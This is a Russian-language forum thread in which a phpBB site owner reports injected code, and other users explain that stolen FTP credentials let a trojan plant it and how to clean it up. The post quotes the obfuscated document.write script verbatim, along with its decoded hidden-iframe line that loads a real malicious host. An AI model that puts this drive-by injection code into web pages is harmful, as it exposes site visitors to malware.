[Scroll]

Не знал, в какой раздел запихнуть, поэтому сунул сюда.

Долгое время форум на PHPBB нормально работал. А вот вчера ПХП начал выдавать ошибки, что не может установить хедеры, потому что они уже отправлены. И сразу начинает ругаться аваст:

сетевой экран: заблокировано соединение с вредоносным сайтом *URL вредоносного сайта*

Посмотрел код сгенерированной страницы, в начало откуда-то добавилось вот это:

Код HTML:

<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%74%64%6D%6E%73%2E%6E%65%74%2F%70%61%72%75%73%2F%3F%74%3D%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</Script><!-- c65 --><!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%74%64%6D%6E%73%2E%6E%65%74%2F%70%61%72%75%73%2F%3F%74%3D%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</Script><!-- c65 -->

Откуда это взялось - не понятно, для успокоения души порылся в исходниках PHPBB, и, естесственно, не нашел, где эта гадость выводится.

Из-за чего может быть такое?

На всякий случай не даю ссылку на форум и вредоносный сайт.

[deMone]

Ну, кто-то добыл пароль к твоему FTP и встроил код вируса. Найди, куда оно встроено и удали.

Могу найти и исправить за 1000 рублей.

[Асмодиан]

А пишет он кстати это:

Код:

<iframe src="http://rtdmns.net/parus/?t=28" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

[Silver]

Scroll, сколько раз говорить не хранить пароли в ФТП-клиентах...

[Nielson]

Да. Такое часто бывает.

[Асмодиан]

Ваш вирус не актуален: 404 Not Found

[divol]

У меня тоже такое было Но у меня только iframe прописал в индекс.php
1. убрал код айфрейма
2. Написал в свой хостинг
3. Написал в хостинг, хостящий сайт указанный в коде iframe, попросил разобраться. Там на меня положили - на этом все и закончилось )

[Scroll]

Цитата:

Сообщение от Silver

Scroll, сколько раз говорить не хранить пароли в ФТП-клиентах...

Дураки учатся на своих ошибках. Теперь буду более осторожен.

[bart]

Знакомая ситуация. Это ваш комп поймал троян, вот почитайте. Вредоносный код у вас, скорее всего во всех файлах index.php и index.html в самом низу перед тегом </html>, хотя может быть и внутри страницы, искать нужно.... Вычищайте код, меняйте пароли к фтп, ну и, конечно, вирус удаляйте. И, как сказано выше, не храните пароли в программах для фтп.

[Scroll]

Да, почистил комп, поменял пароль на FTP, перестал хранить его в ftp-клиенте. Код был прописан во всех index.*, main.*, login.*. На некоторых страницах по 2 раза (обязательно внизу, иногда примерно в середине).